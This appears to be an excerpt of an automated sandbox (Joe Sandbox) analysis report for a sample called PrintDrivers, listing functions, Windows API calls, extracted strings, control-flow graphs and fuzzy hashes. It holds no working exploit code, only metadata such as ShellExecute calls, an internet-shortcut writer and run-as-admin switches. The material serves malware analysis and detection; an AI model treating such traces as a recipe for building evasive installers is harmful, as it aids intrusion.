                                                                    • Instruction ID: 70279baa56be898c779ffb38658178a9a86408dd230ce67f1e6a7b6582643cef
                                                                    • Opcode Fuzzy Hash: 7be65e7440b38e41b36412d6f0a1afaa034a8e7e2489e301212fb7106445ebe6
                                                                    • Instruction Fuzzy Hash: 83312D71A00605AFDB24DF99CC49BAFBBF9FB54710F50492EF416A7280E7B5A904CB90
                                                                    Function 005BCFD5 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 300 5bcfd5-5bcfe2 call 5b985e 302 5bcfe7-5bcff2 300->302 303 5bcff8-5bd000 302->303 304 5bcff4-5bcff6 302->304 305 5bd043-5bd04f call 5b6238 303->305 306 5bd002-5bd006 303->306 304->305 308 5bd008-5bd03d call 5b8473 306->308 312 5bd03f-5bd042 308->312 312->305
                                                                    APIs
                                                                      • Part of subcall function 005B985E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005B67EE,00000001,00000364,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421), ref: 005B989F
                                                                    • _free.LIBCMT ref: 005BD044
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: a1aafe85617cf3f128957af109d46c002444b32766544763277e49ca1aa03896
                                                                    • Instruction ID: 7f321531298f6e141dbe8f66abf12c30b42615e63f248aa8022857b809c670e9
                                                                    • Opcode Fuzzy Hash: a1aafe85617cf3f128957af109d46c002444b32766544763277e49ca1aa03896
                                                                    • Instruction Fuzzy Hash: 8501007260475B6BC3209F68C8899DAFFA8FB453A0F540629E555A76C0E370B9118BA4
                                                                    Function 005B985E Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 313 5b985e-5b9869 314 5b986b-5b9875 313->314 315 5b9877-5b987d 313->315 314->315 316 5b98ab-5b98b6 call 5a9a7c 314->316 317 5b987f-5b9880 315->317 318 5b9896-5b98a7 RtlAllocateHeap 315->318 324 5b98b8-5b98ba 316->324 317->318 320 5b98a9 318->320 321 5b9882-5b9889 call 5b60c2 318->321 320->324 321->316 326 5b988b-5b9894 call 5bcb6e 321->326 326->316 326->318
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005B67EE,00000001,00000364,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421), ref: 005B989F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 8ccdb45225fd7ee2fd600ecf844231dc142bd27f6befbeaf2e4cb5f5ccd09129
                                                                    • Instruction ID: abf657b19aa0f7d262ee16e65c0a7956e57488a613c02001a0a3597ba437f811
                                                                    • Opcode Fuzzy Hash: 8ccdb45225fd7ee2fd600ecf844231dc142bd27f6befbeaf2e4cb5f5ccd09129
                                                                    • Instruction Fuzzy Hash: 3FF0B4326005256ADB215B369C09ADA3F58BFC27A0F144021BA05AA1A0CA20F80086A5

                                                                    Non-executed Functions

                                                                    Function 005A3D28 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 471 5a3d28-5a3fe1 GetModuleHandleW GetProcAddress * 40
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005A3D2E
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005A3D3C
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005A3D4D
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005A3D5E
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005A3D6F
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005A3D80
                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005A3D91
                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005A3DA2
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 005A3DB3
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005A3DC4
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005A3DD5
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005A3DE6
                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005A3DF7
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005A3E08
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005A3E19
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005A3E2A
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005A3E3B
                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005A3E4C
                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005A3E5D
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005A3E6E
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005A3E7F
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005A3E90
                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005A3EA1
                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 005A3EB2
                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 005A3EC3
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 005A3ED4
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005A3EE5
                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 005A3EF6
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005A3F07
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005A3F18
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 005A3F29
                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 005A3F3A
                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005A3F4B
                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005A3F5C
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005A3F6D
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005A3F7E
                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005A3F8F
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005A3FA0
                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 005A3FB1
                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 005A3FC2
                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 005A3FD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                    • API String ID: 667068680-295688737
                                                                    • Opcode ID: a2e43a887f0f87d31c71044b54ea5665c5acc7df81610b5d1160b55b39fdfefa
                                                                    • Instruction ID: b3960e82be0c333b8fce69f59443cc601afda36d4e963aaf013468f9994a9a5e
                                                                    • Opcode Fuzzy Hash: a2e43a887f0f87d31c71044b54ea5665c5acc7df81610b5d1160b55b39fdfefa
                                                                    • Instruction Fuzzy Hash: 756197B5982755AFD7045FF1AE8ED463EB8FA39706304241AB141D71E2E7F84088EF91
                                                                    Function 0058FF00 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 366registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00590246
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,005E16B0,00000800), ref: 00590263
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValue
                                                                    • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin $<s]$ls]
                                                                    • API String ID: 4153817207-3792383248
                                                                    • Opcode ID: add36dd42a6c75017caf28f67d53fc16f69f882878a7133ef3465ca89cd3270b
                                                                    • Instruction ID: 9569027118c000cb8972d53a7f7b1fcb60d38430651b79df2e69496249de41d9
                                                                    • Opcode Fuzzy Hash: add36dd42a6c75017caf28f67d53fc16f69f882878a7133ef3465ca89cd3270b
                                                                    • Instruction Fuzzy Hash: 80C1DF356002528ECF35AF18C80477ABFE1FF95740F98586AE8859B2D1EB70DD82D395
                                                                    Function 005BF173 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,005BF491,00000002,00000000,?,?,?,005BF491,?,00000000), ref: 005BF20C
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,005BF491,00000002,00000000,?,?,?,005BF491,?,00000000), ref: 005BF235
                                                                    • GetACP.KERNEL32(?,?,005BF491,?,00000000), ref: 005BF24A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: efdbb712bb9cae7b4e3ff5f615426be1ec8658039de9100f18ade4eb82952447
                                                                    • Instruction ID: bab895e3cacc93e887d488749b33a73fb82073f66f6c7d90585d823d4cd2eb01
                                                                    • Opcode Fuzzy Hash: efdbb712bb9cae7b4e3ff5f615426be1ec8658039de9100f18ade4eb82952447
                                                                    • Instruction Fuzzy Hash: FB216D3A600102EADB34DF58DD05ADBBAA7FB94B54B668834E90AD7211E732FD41D390
                                                                    Function 005BF348 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 005B664C: GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                      • Part of subcall function 005B664C: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                      • Part of subcall function 005B664C: _free.LIBCMT ref: 005B66AE
                                                                      • Part of subcall function 005B664C: _free.LIBCMT ref: 005B66E4
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 005BF454
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 005BF49D
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 005BF4AC
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005BF4F4
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005BF513
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 949163717-0
                                                                    • Opcode ID: c687ae15968b430816be8be1de4217caf405f5acc619dd1fce0324b044789a09
                                                                    • Instruction ID: d6a8fa158f1a7d1e5787cfe60a9fffd176f09aa0b0771f531ba261fb330c25ab
                                                                    • Opcode Fuzzy Hash: c687ae15968b430816be8be1de4217caf405f5acc619dd1fce0324b044789a09
                                                                    • Instruction Fuzzy Hash: B6516C72A00606AEDF10DFA5DC49AFFBBB8BF58700F184479A915E7190EB71A904CB61
                                                                    Function 005B3C84 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00588D68,?,005B3C83,?,?,00588D68,?,00588D68,00000000), ref: 005B3CA6
                                                                    • TerminateProcess.KERNEL32(00000000,?,005B3C83,?,?,00588D68,?,00588D68,00000000), ref: 005B3CAD
                                                                    • ExitProcess.KERNEL32 ref: 005B3CBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 928c39a0ce39b428eb5afbee992a4c1d203f32221e8c509449f60db369ba4a9e
                                                                    • Instruction ID: 42d6651885d552a375eb1cb77e900b47f4d02f337191918d14f69f7955e6f96c
                                                                    • Opcode Fuzzy Hash: 928c39a0ce39b428eb5afbee992a4c1d203f32221e8c509449f60db369ba4a9e
                                                                    • Instruction Fuzzy Hash: DFE0EC31400A49AFDF116FA4DE0DE883F69FF50741F044424F909A6231DB75EE55DB80
                                                                    Function 005A5448 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005A545E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: d2f2a445e38d0e4d35180a6942d5c8e969b23cc3030696044c2eab1a8844ad4b
                                                                    • Instruction ID: 9f298936ad2d299df902f34d44fe8ae7b7ff57faa6dda22355007d1276254b3a
                                                                    • Opcode Fuzzy Hash: d2f2a445e38d0e4d35180a6942d5c8e969b23cc3030696044c2eab1a8844ad4b
                                                                    • Instruction Fuzzy Hash: CC5180B2D11A05CFDB19CF98DD85BAEBBF1FB58314F18852AC406EB290E374A945CB50
                                                                    Function 005BB9CA Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a01284ca2dcea0d8dfe0b1ce5a1ddc763ba725492e82a202574a37f112f822d4
                                                                    • Instruction ID: 8992c0407ec79b67afbfce1d1d8d2f90bf0233a35334bc5f9faff420ab745425
                                                                    • Opcode Fuzzy Hash: a01284ca2dcea0d8dfe0b1ce5a1ddc763ba725492e82a202574a37f112f822d4
                                                                    • Instruction Fuzzy Hash: 4BE08C32915228EBCB14DB8DC9489CAFBECFB84B50B150196B601D3200C2B0EE00CBD0
                                                                    Function 00586350 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005863CE
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00586427
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00586432
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0058644E
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 0058652B
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 00586537
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C66A5), ref: 0058657F
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 0058659A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C66A5), ref: 005865B7
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 005865E1
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00586628
                                                                    • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 0058667A
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 005866AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                    • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                    • API String ID: 2199533872-3004881174
                                                                    • Opcode ID: 19fdd87a881b7a4627fe939c90e836688281f973d229bd6ce30bc25b88813ed7
                                                                    • Instruction ID: e04723da6464f30cd30bb5d45254bfcbdcb6cbe8f1eac4c7fb2ec0e2b15d468a
                                                                    • Opcode Fuzzy Hash: 19fdd87a881b7a4627fe939c90e836688281f973d229bd6ce30bc25b88813ed7
                                                                    • Instruction Fuzzy Hash: 75B1F471900249AFEB20EF68CC8ABEF7FA4BF55700F144169E914BB2D1D7719A09C7A1
                                                                    Function 005B2E3A Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$Info
                                                                    • String ID:
                                                                    • API String ID: 2509303402-0
                                                                    • Opcode ID: 11316624d7a4d7218cfbe68effe748491062daff372c5a5e46b2679880112299
                                                                    • Instruction ID: 23a13e2f7d257b30b300d00d702b0f33809282ebeb375a03fccd3b29f4a025de
                                                                    • Opcode Fuzzy Hash: 11316624d7a4d7218cfbe68effe748491062daff372c5a5e46b2679880112299
                                                                    • Instruction Fuzzy Hash: 4FD1AB7590020A9FEB11DFA8C885BEEFFF5BF48300F144129E599AB282D775A945CB60
                                                                    Function 005A4A17 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(005E0D24,00000FA0,?,?,005A49F5), ref: 005A4A23
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,005A49F5), ref: 005A4A2E
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,005A49F5), ref: 005A4A3F
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005A4A51
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005A4A5F
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,005A49F5), ref: 005A4A82
                                                                    • ___scrt_fastfail.LIBCMT ref: 005A4A93
                                                                    • DeleteCriticalSection.KERNEL32(005E0D24,00000007,?,?,005A49F5), ref: 005A4A9E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,005A49F5), ref: 005A4AAE
                                                                    Strings
                                                                    • SleepConditionVariableCS, xrefs: 005A4A4B
                                                                    • WakeAllConditionVariable, xrefs: 005A4A57
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005A4A29
                                                                    • kernel32.dll, xrefs: 005A4A3A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 3578986977-3242537097
                                                                    • Opcode ID: 087d98ca799fb7ad2a264bd9b6d88fca0cc580600aa388d535085bd9e3be1eef
                                                                    • Instruction ID: 076634c5f1463e2ffef347eec5ca5bf16de8e9f7b50e977b2b68607d28f06700
                                                                    • Opcode Fuzzy Hash: 087d98ca799fb7ad2a264bd9b6d88fca0cc580600aa388d535085bd9e3be1eef
